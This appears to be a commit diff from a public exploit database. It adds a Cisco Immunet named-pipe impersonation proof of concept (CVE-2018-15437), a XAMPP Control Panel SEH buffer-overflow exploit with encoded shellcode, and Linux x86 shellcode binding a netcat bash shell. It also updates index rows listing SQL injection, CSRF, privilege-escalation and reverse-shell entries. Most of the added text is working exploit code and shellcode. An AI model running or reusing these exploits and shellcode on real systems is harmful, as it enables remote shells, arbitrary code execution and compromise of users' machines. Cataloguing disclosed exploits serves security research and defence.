mov edx, 1 ; dwRevision
mov [rbp+57h+SecurityAttributes.lpSecurityDescriptor], rax
lea rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor
mov [rbp+57h+SecurityAttributes.bInheritHandle], 1
call cs:InitializeSecurityDescriptor
xor r9d, r9d ; bDaclDefaulted
lea rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor
xor r8d, r8d ; pDacl
lea edx, [r9+1] ; bDaclPresent
call cs:SetSecurityDescriptorDacl
mov rcx, [rdi+18h] ; lpName
lea rax, [rbp+57h+SecurityAttributes]
mov [rsp+100h+lpSecurityAttributes], rax ; lpSecurityAttributes
mov edx, 40000003h ; dwOpenMode
mov [rsp+100h+nDefaultTimeOut], esi ; nDefaultTimeOut
mov r9d, 0FFh ; nMaxInstances
mov [rsp+100h+nInBufferSize], 2000h ; nInBufferSize
mov r8d, 6 ; dwPipeMode
mov [rsp+100h+nOutBufferSize], 2000h ; nOutBufferSize
call cs:CreateNamedPipeW
mov [rdi+8], rax
call cs:GetLastError
test eax, eax
jz short loc_140028203
[Exploit/POC]
"Cisco-Immunet-Exploit.c"
*/
#include <windows.h>
#define pipename "\\\\.\\pipe\\IMMUNET_SCAN"
/* Discovered by hyp3rlinx
CVE-2018-15437 */
int main(void) {
while (TRUE){
HANDLE pipe = CreateNamedPipe(pipename, PIPE_ACCESS_INBOUND | PIPE_ACCESS_OUTBOUND , PIPE_WAIT, 1, 1024, 1024, 120 * 1000, NULL);
if (pipe == INVALID_HANDLE_VALUE){
printf("Error: %d", GetLastError());
}else{
printf("%s","pipe created\n");
printf("%x",pipe);
}
ConnectNamedPipe(pipe, NULL);
if(ImpersonateNamedPipeClient(pipe)){
printf("ok!");
}else{
printf("%s%d","WTF",GetLastError());
}
CloseHandle(pipe);
}
return 0;
}
/*
[Network Access]
Local / Remote
[Severity]
High
Disclosure Timeline
=============================
Vendor Notification: August 7, 2018
Vendor acknowledgement: August 7, 2018
Vendor released fixes: November 7th, 2018
November 8, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
*/

76
exploits/windows/local/45828.py Executable file
View file

@ -0,0 +1,76 @@
# Exploit Title: XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)
# Exploit Author: Gionathan "John" Reale (0-day DoS exploit), Semen Alexandrovich Lyhin (1-day fully working exploit).
# Shellcode Author: Giuseppe D'Amore (EDB:28996)
# Date: 2018-11-08.
# Software: XAMPP
# Version: 3.2.2 / 7.2.9 (Newest version at time of writing)
# Download: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/7.2.9/xampp-portable-win32-7.2.9-0-VC15-installer.exe/download
# Tested on: Windows 10 64bit with XAMPP 32bit. Should work on any Windows since XP.
# Special thanks to Deloitte Ukraine for providing a few payed hours to create this exploit.
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name "exploit.txt".
# Copy the contents of "exploit.txt"
# Start the program and click "Config (Top Right With Symbol)"
# Paste the contents of "exploit.txt" into the following field: "Editor".
# Click "Save" and then in the main window Click "Config" > "Apache (httpd.conf)".
# You will see that arbitrary code is executed. It should pop a messagebox.
#cat 28996.bin | msfvenom -p - -a x86 --platform win -f py -e x86/unicode_mixed BufferRegister=EAX
#Length is 352, but double it.
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x50\x31\x4a\x32\x68\x32"
buf += "\x50\x30\x61\x54\x34\x4b\x4a\x72\x74\x4b\x72\x32\x6a"
buf += "\x6c\x44\x4b\x4e\x72\x4d\x4c\x62\x6b\x4d\x72\x79\x78"
buf += "\x62\x6b\x31\x62\x4d\x50\x34\x4b\x4b\x62\x31\x70\x51"
buf += "\x6e\x6a\x6c\x50\x33\x62\x55\x68\x72\x75\x39\x69\x37"
buf += "\x4a\x63\x51\x68\x6f\x4c\x52\x6b\x4f\x67\x44\x38\x4a"
buf += "\x61\x45\x72\x52\x6b\x33\x4a\x4f\x30\x7a\x61\x77\x57"
buf += "\x4e\x51\x38\x6d\x64\x4b\x4d\x64\x74\x6f\x4a\x61\x36"
buf += "\x66\x70\x45\x42\x61\x6d\x6e\x4e\x66\x43\x31\x64\x34"
buf += "\x50\x61\x72\x55\x58\x72\x32\x61\x53\x4e\x49\x78\x6f"
buf += "\x55\x51\x68\x32\x49\x53\x44\x32\x55\x57\x79\x52\x6b"
buf += "\x53\x4a\x6f\x34\x4a\x61\x55\x77\x6f\x76\x62\x6b\x6e"
buf += "\x4c\x50\x6f\x54\x4b\x51\x6a\x6d\x4c\x6d\x31\x36\x67"
buf += "\x42\x6b\x63\x4c\x36\x4f\x79\x6c\x39\x71\x37\x57\x72"
buf += "\x48\x4d\x75\x4f\x54\x4f\x31\x6b\x51\x33\x38\x30\x4c"
buf += "\x6e\x6f\x71\x39\x4e\x74\x50\x68\x6b\x70\x51\x35\x6f"
buf += "\x68\x42\x30\x71\x79\x69\x51\x59\x6e\x70\x49\x5a\x6b"
buf += "\x4c\x71\x47\x50\x4e\x71\x62\x30\x69\x6f\x59\x47\x41"
buf += "\x41"
# venetian padding
ven = "\x53" #push esi
ven += "\x43" #align
ven += "\x58" #pop eax
ven += "\x43" #align
ven += "\x05\x50\x11" #add eax,11005000
ven += "\x43" #align
ven += "\x2d\x1c\x11" #sub eax,33001700
ven += "\x43" #align
ven += "\x48" #dec eax
ven += "\x43" #align
ven += "\x43"*2 #nops
payload = "\x43"*270 + "\x37\x53" + ven + buf + "\x43" * (6000 - 2 - 270 - len(ven+buf))
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

39
files_exploits.csv
View file

@ -6185,6 +6185,9 @@ id,file,description,date,author,type,platform,port
45806,exploits/windows/dos/45806.py,"HeidiSQL 9.5.0.5196 - Denial of Service (PoC)",2018-11-12,"Victor Mondragón",dos,windows,
45814,exploits/windows_x86-64/dos/45814.py,"CuteFTP 9.3.0.3 - Denial of Service (PoC)",2018-11-12,"Ismael Nava",dos,windows_x86-64,
45819,exploits/windows_x86-64/dos/45819.py,"Mongoose Web Server 6.9 - Denial of Service (PoC)",2018-11-12,"Ihsan Sencan",dos,windows_x86-64,
45823,exploits/macos/dos/45823.py,"CuteFTP Mac 3.1 - Denial of Service (PoC)",2018-11-13,"Yair Rodríguez Aparicio",dos,macos,
45824,exploits/linux/dos/45824.txt,"Evince 3.24.0 - Command Injection",2018-11-13,Matlink,dos,linux,
45829,exploits/windows/dos/45829.c,"Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service",2018-11-13,hyp3rlinx,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10094,6 +10097,8 @@ id,file,description,date,author,type,platform,port
45798,exploits/linux/local/45798.txt,"libiec61850 1.3 - Stack Based Buffer Overflow",2018-11-06,"Dhiraj Mishra",local,linux,
45804,exploits/linux/local/45804.txt,"OpenSLP 2.0.0 - Multiple Vulnerabilities",2018-11-07,"Magnus Klaaborg Stubman",local,linux,
45805,exploits/windows/local/45805.cpp,"Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)",2018-11-08,"Tenable NS",local,windows,
45828,exploits/windows/local/45828.py,"XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)",2018-11-13,"Semen Alexandrovich Lyhin",local,windows,
45832,exploits/linux/local/45832.py,"xorg-x11-server < 1.20.1 - Local Privilege Escalation",2018-11-13,bolonobolo,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40317,15 +40322,33 @@ id,file,description,date,author,type,platform,port
45801,exploits/php/webapps/45801.txt,"OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection",2018-11-06,AkkuS,webapps,php,80
45802,exploits/php/webapps/45802.txt,"LibreHealth 2.0.0 - Arbitrary File Actions",2018-11-06,"Carlos Avila",webapps,php,80
45803,exploits/php/webapps/45803.txt,"PlayJoom 0.10.1 - 'catid' SQL Injection",2018-11-07,"Ihsan Sencan",webapps,php,80
45807,exploits/php/webapps/45807.txt,"Data Center Audit 2.6.2 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,
45807,exploits/php/webapps/45807.txt,"Data Center Audit 2.6.2 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80
45808,exploits/linux/webapps/45808.txt,"TufinOS 2.17 Build 1193 - XML External Entity Injection",2018-11-12,"Konstantinos Alexiou",webapps,linux,
45809,exploits/php/webapps/45809.txt,"Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal",2018-11-12,"Pasquale Turi",webapps,php,
45810,exploits/php/webapps/45810.txt,"Paroiciel 11.20 - 'tRecIdListe' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,
45809,exploits/php/webapps/45809.txt,"Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal / Cross-Site Scripting",2018-11-12,"Pasquale Turi",webapps,php,80
45810,exploits/php/webapps/45810.txt,"Paroiciel 11.20 - 'tRecIdListe' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80
45811,exploits/hardware/webapps/45811.rb,"TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure)",2018-11-12,Wadeek,webapps,hardware,
45812,exploits/php/webapps/45812.txt,"The Don 1.0.1 - 'login' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,
45813,exploits/php/webapps/45813.txt,"Facturation System 1.0 - 'modid' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,
45812,exploits/php/webapps/45812.txt,"The Don 1.0.1 - 'login' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80
45813,exploits/php/webapps/45813.txt,"Facturation System 1.0 - 'modid' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80
45815,exploits/php/webapps/45815.txt,"Easyndexer 1.0 - Cross-Site Request Forgery (Add Admin)",2018-11-12,"Ihsan Sencan",webapps,php,
45816,exploits/php/webapps/45816.txt,"GPS Tracking System 2.12 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,
45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,
45816,exploits/php/webapps/45816.txt,"GPS Tracking System 2.12 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80
45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80
45818,exploits/hardware/webapps/45818.txt,"D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery",2018-11-12,hyp3rlinx,webapps,hardware,
45820,exploits/php/webapps/45820.txt,"Nominas 0.27 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,
45820,exploits/php/webapps/45820.txt,"Nominas 0.27 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80
45822,exploits/php/webapps/45822.txt,"CentOS Web Panel 0.9.8.740 - Cross-Site Request Forgery / Cross-Site Scripting",2018-11-13,InfinitumIT,webapps,php,
45825,exploits/php/webapps/45825.txt,"Surreal ToDo 0.6.1.2 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
45826,exploits/php/webapps/45826.txt,"Surreal ToDo 0.6.1.2 - Local File Inclusion",2018-11-13,"Ihsan Sencan",webapps,php,80
45827,exploits/php/webapps/45827.txt,"Alienor Web Libre 2.0 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
45830,exploits/php/webapps/45830.txt,"Musicco 2.0.0 - Arbitrary Directory Download",2018-11-13,"Ihsan Sencan",webapps,php,80
45831,exploits/php/webapps/45831.txt,"Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,
45833,exploits/php/webapps/45833.txt,"Tina4 Stack 1.0.3 - SQL Injection / Database File Download",2018-11-13,"Ihsan Sencan",webapps,php,80
45834,exploits/php/webapps/45834.txt,"Tina4 Stack 1.0.3 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80
45835,exploits/php/webapps/45835.txt,"Easyndexer 1.0 - Arbitrary File Download",2018-11-13,"Ihsan Sencan",webapps,php,80
45836,exploits/php/webapps/45836.txt,"ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80
45837,exploits/php/webapps/45837.txt,"Gumbo CMS 0.99 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
45838,exploits/php/webapps/45838.txt,"Silurus Classifieds Script 2.0 - 'wcategory' SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
45839,exploits/php/webapps/45839.txt,"ClipperCMS 1.3.3 - Cross-Site Request Forgery (File Upload)",2018-11-13,"Ameer Pornillos",webapps,php,80
45840,exploits/php/webapps/45840.txt,"Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload",2018-11-13,"Ihsan Sencan",webapps,php,80
45841,exploits/php/webapps/45841.txt,"Maitra Mail Tracking System 1.7.2 - SQL Injection / Database File Download",2018-11-13,"Ihsan Sencan",webapps,php,80
45842,exploits/php/webapps/45842.txt,"Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80
45843,exploits/php/webapps/45843.txt,"Webiness Inventory 2.3 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
45844,exploits/php/webapps/45844.txt,"SIPve 0.0.2-R19 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -922,3 +922,4 @@ id,file,description,date,author,type,platform
45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips
45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86
45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86

1 id file description date author type platform
922 45541 shellcodes/linux_mips/45541.c Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes) 2018-10-08 cq674350529 shellcode linux_mips
923 45669 shellcodes/linux_x86/45669.c Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes 2018-10-24 Goutham Madhwaraj shellcode linux_x86
924 45743 shellcodes/windows_x86-64/45743.c Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator) 2018-10-30 Roziul Hasan Khan Shifat shellcode windows_x86-64
925 45821 shellcodes/linux_x86/45821.c Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes) 2018-11-13 Javier Tello shellcode linux_x86

55
shellcodes/linux_x86/45821.c Normal file
View file

@ -0,0 +1,55 @@
/*
# Exploit Title: Linux/x86 - execve /bin/nc -lp99999 -e /bin/bash shellcode (58 bytes)
# Exploit Description: Binds a TCP bash shell at port 99999 using netcat. Note: This shellcode uses netcat-traditional package. Otherwise, it will not work.
# Date: 04/11/2018
# Exploit Author: Javier Tello <jtelloal@gmail.com>
# Version: 1.0
# Tested on: i686 GNU/Linux
# Shellcode Length: 58 Bytes
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 6e 2f 6e 63 push $0x636e2f6e
8048068: 68 2f 2f 62 69 push $0x69622f2f
804806d: 89 e3 mov %esp,%ebx
804806f: 50 push %eax
8048070: 68 62 61 73 68 push $0x68736162
8048075: 68 62 69 6e 2f push $0x2f6e6962
804807a: 68 2d 65 2f 2f push $0x2f2f652d
804807f: 89 e2 mov %esp,%edx
8048081: 50 push %eax
8048082: 68 39 39 39 39 push $0x39393939
8048087: 68 2d 6c 70 39 push $0x39706c2d
804808c: 89 e6 mov %esp,%esi
804808e: 50 push %eax
804808f: 52 push %edx
8048090: 56 push %esi
8048091: 53 push %ebx
8048092: 89 e1 mov %esp,%ecx
8048094: 89 c2 mov %eax,%edx
8048096: b0 0b mov $0xb,%al
8048098: cd 80 int $0x80
===============poc by Javier Tello=========================
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x6e\x2f\x6e\x63\x68\x2f\x2f\x62\x69\x89\xe3\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2d\x65\x2f\x2f\x89\xe2\x50\x68\x39\x39\x39\x39\x68\x2d\x6c\x70\x39\x89\xe6\x50\x52\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}